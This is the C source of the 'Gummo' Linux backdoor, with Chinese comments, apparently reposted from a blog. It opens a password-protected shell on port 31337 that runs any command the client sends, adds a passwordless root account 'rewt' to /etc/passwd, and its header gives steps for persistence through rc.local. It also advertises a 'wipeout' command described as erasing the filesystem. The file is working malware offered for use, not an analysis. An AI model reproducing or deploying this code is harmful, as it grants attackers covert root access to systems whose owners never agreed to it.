/*
/* Gummo 后门服务器
/* 编译: cc server.c -o server
/* 使用: ./server &
/* echo /tmp/server & >> /etc/rc.d/rc.local
*/
#include <stdio.h>
#include <stdlib.h>
#include <errno.h>
#include <string.h>
#include <sys/types.h>
#include <netinet/in.h>
#include <sys/socket.h>
#include <sys/wait.h>
#include <unistd.h>
#define PORT 31337
#define BACKLOG 5
#define CMD_LOG "/tmp/.cmd"
#define PASSWORD "password"
/* global */
int newfd;
void command ();
void
main ()
{
int sockfd, sin_size, ss, len, bytes;
struct sockaddr_in my_addr;
struct sockaddr_in their_addr;
char passwd[1024];
char *prompt = "Password: ";
char *gp;
//创建一个套节字
if ((sockfd = socket (AF_INET, SOCK_STREAM, 0)) == -1)
{
perror ("socket");
exit (1);
}
my_addr.sin_family = AF_INET;
my_addr.sin_port = htons (PORT);
my_addr.sin_addr.s_addr = INADDR_ANY;
bzero (&(my_addr.sin_zero), 8);
//绑定端口
if (bind (sockfd, (struct sockaddr *) &my_addr, sizeof (struct sockaddr)) \
== -1)
{
perror ("bind");
exit (1);
}
//接听
if (listen (sockfd, BACKLOG) == -1)
{
perror ("listen");
exit (1);
}
while (1)
{
ss = sizeof (struct sockaddr_in);
//一直接收着 返回新的套节字
if ((newfd = accept (sockfd, (struct sockaddr *) &their_addr, \
&sin_size)) == -1)
{
perror ("accept");
exit (1);
}
//创建一个进程
//子进程返回0 错误返回-1 父进程返回 pid
if (fork ())
{
///////////////////父进程中/////////////////////////
len = strlen (prompt);
//往新的套节字里发数据也就是往客服端发数据
bytes = send (newfd, prompt, len, 0);
//接收客服端的数据也就是密码
recv (newfd, passwd, 1024, 0);
//判断13首次出现位置
if ((gp = strchr (passwd, 13)) != NULL)
*(gp) = '\0';
//密码正解
if (!strcmp (passwd, PASSWORD))
{
//继续发给客服端
send (newfd, "准许访问, HEH\n", 21, 0);
send (newfd, "\n\n\n\n\n\n欢迎来到Gummo后门服务器!\n\n", 41, 0);
send (newfd, "Type 'HELP' for a list of commands\n\n", 36, 0);
//将处理所有发送的命令并将它们的输出发送给客户端
command ();
}
//密码错误直接退出
else if (passwd != PASSWORD)
{
send (newfd, "Authentification Failed! =/\n", 29, 0);
close (newfd);
}
}
}
}
//处理客服端的命令
void
command ()
{
FILE *read;
FILE *append;
char cmd_dat[1024];
char *cmd_relay;
char *clean_log;
char buf[5000];
int dxm;
while (1)
{
//先发送一个提示
send (newfd, "command:~# ", 11, 0);
//等待接收
recv (newfd, cmd_dat, 1024, 0);
cmd_dat[strlen (cmd_dat) - 2] = '\0';
//判断命令是否为空
if (strcmp (cmd_dat, ""))
{
//命令 HELP
if ((strstr (cmd_dat, "HELP")) == cmd_dat)
{
//help
send (newfd, "\n\n-=Help Menu=-\n", 16, 0);
//quit
send (newfd, "\nquit - to exit gummo backdoor\n", 31, 0);
//rewt
send (newfd, "rewt - automatically creates non passworded accnt 'rewt' uid0\n", 63, 0);
//wipeout
send (newfd, "wipeout - this feature rm -rf /'s a box. Inspired by dethcraze\n", 64, 0);
}
//quit
if ((strstr (cmd_dat, "quit")) == cmd_dat)
{
close (newfd);
}
//rewt
if ((strstr (cmd_dat, "rewt")) == cmd_dat)
{
system ("echo rewt::0:0::/:/bin/sh>>/etc/passwd;");
send (newfd, "User 'rewt' added!\n", 19, 0);
}
//wipout
if ((strstr (cmd_dat, "wipeout")) == cmd_dat)
{
send (newfd, "你尝试使用这个命令是不行的, HEH!\n", 54, 0);
close(newfd);
exit(0);
}
else
//搞一个临时文件保存命令字符串
append = fopen (CMD_LOG, "w");
fprintf (append, "dextro\n");
fclose (append);
//用于清理日志
clean_log = (char *) malloc (420);
sprintf (clean_log, "rm %s", CMD_LOG);
system (clean_log);
cmd_relay = (char *) malloc (1024);
//用于输出重定向
snprintf (cmd_relay, 1024, "%s > %s;\0", cmd_dat, CMD_LOG);
system (cmd_relay);
if ((read = fopen (CMD_LOG, "r")) == NULL)
continue;
while (!(feof (read)))
{
memset (buf, 0, 500);
fgets (buf, 500, read);
if (buf[0] == 0)
break;
write (newfd, buf, 500);
}
fclose (read);
}
}
}
linux 后门程序
猜你喜欢
转载自blog.51cto.com/haidragon/2142842
今日推荐
周排行